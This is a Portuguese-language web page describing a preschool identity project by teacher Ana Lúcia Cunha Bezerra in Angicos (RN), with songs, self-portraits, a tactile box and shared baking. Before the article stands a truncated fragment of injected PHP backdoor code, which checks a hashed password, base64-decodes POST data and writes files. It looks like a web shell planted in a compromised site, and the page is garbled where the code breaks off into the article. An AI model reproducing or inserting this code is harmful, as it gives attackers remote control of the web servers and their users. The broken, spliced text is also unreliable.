/tmp/ksuak.jpg function grock_render_js(){ echo ""; } function grock_render_index(){ echo md5('56749'); } function grock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4="
Ana Lúcia Cunha Bezerra – Angicos (RN)
O projeto “Eu, Nós e todo mundo na escola” da educadora Ana Lucia Bezerra teve como objetivo trabalhar a identidade da criança, possibilitando o reconhecimento de si mesma e ao outro, as igualdades e diferenças de cada um. Este projeto foi realizado com 21 crianças com 3 anos.
Graduada em Pedagogia, com Pós-Graduação em Educação Infantil, a educadora Ana Lucia Cunha Bezerra atua na Educação Infantil no município de Angicos/RN tanto como professora principal quanto como professora auxiliar.
O projeto começou com cantigas de roda que falam sobre partes do corpo. Dentre elas: “caranguejo não é peixe”, “Fui ao mercado” e “Cabeça, ombro, joelho e pé”, e os alunos realizavam os comandos da música, promovendo assim o desenvolvimento da motricidade, identificação de partes do nosso corpo e interação com os colegas.
Em seguida, tiveram o “Bom dia com poesia”, em que a poetisa Fatuca Silva declamou poesias sobre o corpo e a importância da higiene pessoal para se viver com saúde.
Foi realizada a dinâmica do espelho, em que as crianças exploraram algumas características do próprio rosto. Eles fizeram o autorretrato com auxílio de um espelho. As crianças olhavam a sua imagem e depois desenhavam no papel. Depois, trabalharam com modelagem possibilitando o desenvolvimento da coordenação motora fina, em que os alunos modelaram o próprio corpo.
Em seguida, trabalharam com uma caixa tátil, em que colocaram diversos materiais na caixa e foi pedido para que cada criança tirasse um a fim de estimular a percepção e o sentido do tato.
Na sequência realizaram uma pintura a dedo com tinta guache para estimular a criatividade e a coordenação das crianças.
Depois, os alunos trouxeram pra escola o brinquedo favorito e mostraram umas para as outras como brincavam com ele, descrevendo algumas características, ajudando na socialização.
Depois, foi feita a Caixa Surpresa: com ajuda dos pais, realizaram uma pesquisa da fruta preferida de cada aluno. Eles trouxeram para a escola e colocaram na caixa surpresa. Foram feitas algumas perguntas até cada um adivinhar qual era a fruta. No fim, realizaram um café coletivo.
Depois, fizeram uma brincadeira de faz de conta para ajudar na construção da identidade da criança, que pode desempenhar vários papéis (pai, mãe, filho, avó etc.), experimentando diversas situações de aprendizagem.
Foi feita uma pesquisa sobre a sobremesa preferida das mães da sala. Depois, a mais votada (bolo de cenoura) foi feita pelas crianças com a ajuda da professora. Foi um momento de aprendizagem e socialização entre mães, filhos e escola.